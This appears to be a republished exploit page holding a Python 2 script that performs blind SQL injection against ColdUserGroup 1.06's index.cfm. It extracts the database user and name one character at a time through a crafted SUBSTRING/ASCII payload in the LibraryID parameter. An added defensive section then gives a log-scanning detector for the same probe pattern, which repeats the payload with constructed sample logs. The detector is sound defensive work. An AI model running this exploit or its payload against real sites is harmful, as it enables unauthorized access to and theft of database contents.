ColdUserGroup 1.06 Blind SQL Injection Exploit
Source: ninja.net  Author: mr_me  Published: 2010-09-08

#!/usr/bin/python
# ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerabilities:
# ===================
# - Blind SQL Injection in the index.cfm using parameters: ArticleID & LibraryID
# - XSS in the search
#
# This tool assumes the target has a MSSQL backend.
# ./ColdUsrGrp0day.py -p localhost:8080 -s "Author:" -t localhost:8500 -d /coldusrgrp/
#
#  | ----------------------------------------------------------------- |
#  |  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |
#  | -------------------[ by mr_me - net-ninja.net ]------------------ |
#
# (+) Exploiting target @: http://localhost:8500/coldusrgrp/
# (+) Using string 'Author:' for the true page
# (+) This will take time, have patience..
#
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
#
# (!) Getting database user: sa
# (!) Getting database name: coldusergroup

import sys, socket, urllib, re  # socket is needed for the except clauses below
from optparse import OptionParser

usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t localhost:8500 -d /coldusrgrp/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
                  help="String that is on the 'true' page")
(options, args) = parser.parse_args()

def banner():
    print "\n\t| ----------------------------------------------------------------- |"
    print "\t|  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |"
    print "\t| -------------------[ by mr_me - net-ninja.net ]------------------ |\n"

if len(sys.argv) < 5:
 banner()
 parser.print_help()
 sys.exit(1)

def setTargetHTTP():
 if options.target[0:7] != 'http://':
  options.target = "http://" + options.target
 return options.target
 
def getProxy():
 # Build a urllib opener that routes requests through the given HTTP proxy
 try:
  proxy = {'http': "http://"+options.proxy}
  opener = urllib.FancyURLopener(proxy)
 except socket.timeout:
  print "\n(-) Proxy Timed Out"
  sys.exit(1)
 except Exception, msg:
  print "\n(-) Proxy Failed: %s" % msg
  sys.exit(1)
 return opener
 
def getRequest(exploit):
 # Fetch one page, through the proxy when one was given. Python 2 urllib has no
 # urllib.error module: connection and HTTP failures surface as IOError (of which
 # socket.error is a subclass), and FancyURLopener returns HTTP error pages as
 # ordinary responses, so the page body is what gets searched for the true string.
 if options.proxy:
  try:
   options.target = setTargetHTTP()
   opener = getProxy()
   check = opener.open(options.target+options.directory+exploit).read()
  except (IOError, socket.error):
   print "(-) Proxy connection failed"
   sys.exit(1)
 else:
  try:
   check = urllib.urlopen(options.target+options.directory+exploit).read()
  except (IOError, socket.error):
   print "(-) Target connection failed, check your address"
   sys.exit(1)
 return check

basicInfo = {'user':'user_name(0)', 'name':'db_name(0)'}

def getBasicInfo(info, x):
 # Boolean-based extraction: position x of the result is compared against every
 # printable ASCII code; the code whose page contains the true string is the
 # character at that position, and the next position is tried recursively.
 for i in range(32,126):
  request = ("index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL"
  "(ASCII(SUBSTRING(CAST((SELECT+LOWER("+info+"))AS+varchar(8000)),"+str(x)+",1)),0)="+str(i))
  result = getRequest(request)
  if re.search(options.trueStr,result):
   x = x+1
   sys.stdout.write(chr(i))
   getBasicInfo(info, x)
 
if __name__ == "__main__":
 x = 1
 banner()
 options.target = setTargetHTTP()
 print "(+) Exploiting target @: %s" % (options.target+options.directory)
 print "(+) Using string '%s' for the true page" % (options.trueStr)
 print "(+) This will take time, have patience.."
 if options.proxy:
  print "\n(+) Testing Proxy..."
  print "(+) Proxy @ %s" % (options.proxy)
  print "(+) Building Handler.."

 for key in basicInfo:
  sys.stdout.write("\n(!) Getting database " + key + ": ")
  getBasicInfo(basicInfo[key], x)
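
From the defender's side, the traffic this script produces is distinctive: an integer id followed by an AND ISNULL(ASCII(SUBSTRING(...))) comparison in the LibraryID or ArticleID parameter of index.cfm, one request per candidate byte, so a single extracted character costs up to 94 requests from the same client. The detector below picks that pattern out of web-server access logs. It is an added example written for this page, not part of mr_me's script or of the ColdUserGroup product; the combined log format, the IP addresses in the sample log and the five-request alert threshold are constructed assumptions.

```python
"""Flag boolean-based blind SQL injection probes of the kind the script above
sends against ColdUserGroup's index.cfm, using web-server access logs.

Added example: not part of the original exploit or of ColdUserGroup. The log
format, client addresses and the alert threshold are constructed assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Parameters the advisory names as injectable in index.cfm.
INJECTABLE_PARAMS = ("LibraryID", "ArticleID")

# Shape of each probe: a numeric id, then AND ISNULL(ASCII(SUBSTRING(... .
# Matched after URL decoding, so '+' and '%20' both appear as spaces.
PROBE_RE = re.compile(
    r"^\d+\s+AND\s+ISNULL\s*\(\s*ASCII\s*\(\s*SUBSTRING\s*\(", re.IGNORECASE
)

# Minimal parser for Apache/IIS-style combined log lines (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def probe_value(path):
    """Return (param, decoded value) when a request to index.cfm carries an
    injection probe in a known-vulnerable parameter, else None."""
    url = urlparse(path)
    if not url.path.lower().endswith("/index.cfm"):
        return None
    # parse_qs percent-decodes and turns '+' into spaces; keys compared case-insensitively
    query = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    for param in INJECTABLE_PARAMS:
        for value in query.get(param.lower(), []):
            if PROBE_RE.match(value):
                return param, value
    return None


def scan_log(lines, threshold=5):
    """Group probes per client address. A client at or above `threshold`
    probes is reported with its request count and the parameters it hit."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        found = probe_value(rec["path"])
        if found is not None:
            hits[rec["ip"]].append(found)
    return {
        ip: {"count": len(v), "params": sorted({p for p, _ in v})}
        for ip, v in hits.items()
        if len(v) >= threshold
    }


# Constructed sample log: 198.51.100.7 walks one character the way the script
# does (one request per candidate byte) and also probes ArticleID with %20
# encoding; 192.0.2.44 sends a single probe; 203.0.113.5 is ordinary traffic.
_TS = "[08/Sep/2010:10:00:01 +0000]"
_SQLI = ("AND+ISNULL(ASCII(SUBSTRING(CAST((SELECT+LOWER(user_name(0)))"
         "AS+varchar(8000)),1,1)),0)=")
_ATTACKER = '198.51.100.7 - - %s "GET /coldusrgrp/index.cfm?actcfug=LibraryView&%s HTTP/1.1" 200 4821'
SAMPLE_LOG = "\n".join(
    ['203.0.113.5 - - %s "GET /coldusrgrp/index.cfm?actcfug=LibraryView&LibraryID=209 HTTP/1.1" 200 4821' % _TS]
    + [_ATTACKER % (_TS, "LibraryID=209+" + _SQLI + str(code)) for code in range(97, 102)]
    + [_ATTACKER % (_TS, "ArticleID=209%20" + _SQLI.replace("+", "%20") + "115")]
    + ['192.0.2.44 - - %s "GET /coldusrgrp/index.cfm?actcfug=LibraryView&LibraryID=209+%s97 HTTP/1.1" 200 4821' % (_TS, _SQLI)]
    + ["not an access log line at all"]
    + ['203.0.113.5 - - %s "GET /coldusrgrp/index.cfm?actcfug=search&searchtext=test HTTP/1.1" 200 1188' % _TS]
)

if __name__ == "__main__":
    for ip, info in scan_log(SAMPLE_LOG.splitlines()).items():
        print("%s: %d blind SQLi probes via %s" % (ip, info["count"], ", ".join(info["params"])))
```

The threshold is deliberately low because a legitimate LibraryID is a bare integer; even one decoded value that matches PROBE_RE is worth an alert, and the per-client count mainly shows how far an extraction has progressed. The same parser can be pointed at a real log file by replacing SAMPLE_LOG.splitlines() with the file's lines.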

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved